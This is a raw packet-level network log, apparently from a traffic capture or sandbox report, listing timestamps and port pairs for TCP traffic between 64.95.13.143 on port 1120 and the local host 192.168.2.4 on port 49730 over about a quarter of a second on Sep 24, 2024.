Sep 24, 2024 17:46:11.068960905 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.068972111 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.068981886 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.068991899 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.069001913 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.069005013 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.069013119 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.069031954 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.069047928 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.069807053 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.069818974 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.069829941 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.069842100 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.069849968 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.069852114 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.069863081 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.069874048 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.069884062 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.069911003 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.091151953 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.091166019 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.091177940 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.091248035 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.091299057 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.091381073 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.091398954 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.091411114 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.091422081 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.091435909 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.091454983 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.091963053 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.091974020 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.091989040 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.091995001 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.092000008 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.092005968 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.092005968 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.092010975 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.092030048 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.092053890 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.092816114 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.092828035 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.092839003 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.092849970 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.092859983 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.092860937 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.092873096 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.092883110 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.092885017 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.092900991 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.092920065 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.157989979 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.158015966 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.158027887 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.158077002 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.158107042 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.158143044 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.158195972 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.158427000 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.158437967 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.158447981 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.158463955 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.158482075 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.169042110 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.169069052 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.169081926 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.169107914 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.169579029 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.169593096 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.169603109 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.169615030 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.169615030 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.169627905 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.169631958 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.169673920 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.169994116 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.170025110 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.170036077 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.170047045 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.170058012 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.170068979 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.170078039 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.170763969 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.170775890 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.170785904 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.170794010 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.170797110 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.170809031 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.170819044 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.170819998 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.170830965 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.170875072 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.170875072 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.171550035 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.171560049 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.171571016 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.171591043 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.171602011 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.171611071 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.171619892 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.171624899 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.171636105 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.171648026 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.171674013 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.172764063 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.172771931 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.172775030 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.172781944 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.172789097 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.172797918 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.172801018 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.172821045 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.172842026 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.173271894 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.173319101 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.173495054 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.173507929 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.173541069 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.173691988 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.173753023 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.173768044 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.173774958 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.173777103 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.173791885 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.173811913 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.174411058 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.174423933 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.174434900 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.174447060 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.174451113 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.174458981 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.174477100 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.174479961 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.174508095 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.175982952 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.176032066 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.176096916 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.176109076 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.176146030 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.176969051 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.176975965 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.176983118 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.177021980 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.177093029 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.177129984 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.177135944 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.177150011 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.177184105 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.177604914 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.177615881 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.177625895 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.177640915 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.177649975 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.177651882 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.177673101 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.181500912 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.181559086 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.181560993 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.181570053 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.181606054 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.181768894 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.181791067 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.181802034 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.181813002 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.181823015 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.181842089 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.184516907 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.184593916 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.184604883 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.184653044 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.184799910 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.184811115 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.184820890 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.184832096 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.184842110 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.184847116 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.184875011 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.185194969 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.185206890 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.185218096 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.185229063 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.185239077 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.185250044 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.185256958 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.185285091 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.190256119 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.190329075 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.190340042 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.190388918 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.190542936 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.190583944 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.190623999 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.190637112 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.190648079 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.190659046 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.190668106 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.190689087 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.191266060 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.191277027 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.191288948 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.191299915 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.191314936 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.191325903 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.191327095 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.191358089 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.191979885 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.191992044 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.192002058 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.192012072 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.192023039 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.192034006 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.192040920 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.192044020 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.192065954 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.232527018 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.251662970 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.251678944 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.251698017 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.251728058 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.251794100 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.251806021 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.251816988 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.251828909 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.251847982 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.252110004 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.252123117 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.252166033 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.262227058 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.262239933 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.262250900 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.262300014 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.263067007 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.263104916 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.263246059 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.263401985 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.263442039 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.263528109 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.263649940 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.263662100 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.263672113 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.263681889 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.263684034 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.263694048 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.263703108 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.263706923 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.263722897 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.263776064 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.263928890 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.263938904 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.263948917 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.263973951 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.263982058 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.263983011 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.263993979 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.264005899 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.264013052 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.264017105 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.264036894 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.264061928 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.264626980 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.264755011 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.264765978 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.264775991 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.264786005 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.264790058 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.264797926 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.264803886 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.264810085 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.264820099 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.264837027 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.264852047 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.265525103 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.265558958 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.265593052 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.268481970 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.268642902 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.268662930 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.268690109 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.270224094 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.270231962 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.270234108 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.270236969 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.270251036 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.270262003 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.270273924 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.270282030 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.270283937 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.270296097 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.270306110 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.270313025 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.270318031 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.270328045 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.270328045 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.270358086 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.270370007 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.270380974 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.270390034 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.270400047 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.270401001 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.270411968 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.270418882 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.270431042 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.270442009 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.270445108 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.270479918 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.271856070 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.271982908 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.272001982 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.272022009 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.272332907 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.272344112 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.272355080 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.272366047 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.272368908 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.272388935 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.273602009 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.273613930 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.273628950 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.273642063 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.273658991 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.273782969 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.273804903 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.273837090 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.273962021 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.273988008 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.274015903 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.277635098 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.277790070 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.277812004 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.277932882 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.277954102 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.277991056 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.278117895 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.278281927 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.278321028 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.278453112 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.278476954 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.278513908 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.280596972 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.280616999 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.280630112 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.280658007 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.280741930 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.280761003 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.280782938 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.280925989 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.280942917 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.280963898 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.281429052 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.281445980 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.281456947 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.281466007 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.281471968 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.281488895 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.281708956 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.281749010 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.281841993 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.281853914 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.281862974 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.281888008 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.286501884 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.286513090 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.286529064 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.286555052 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.286576986 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.286803007 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.286822081 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.286855936 CEST497301120192.168.2.464.95.13.143
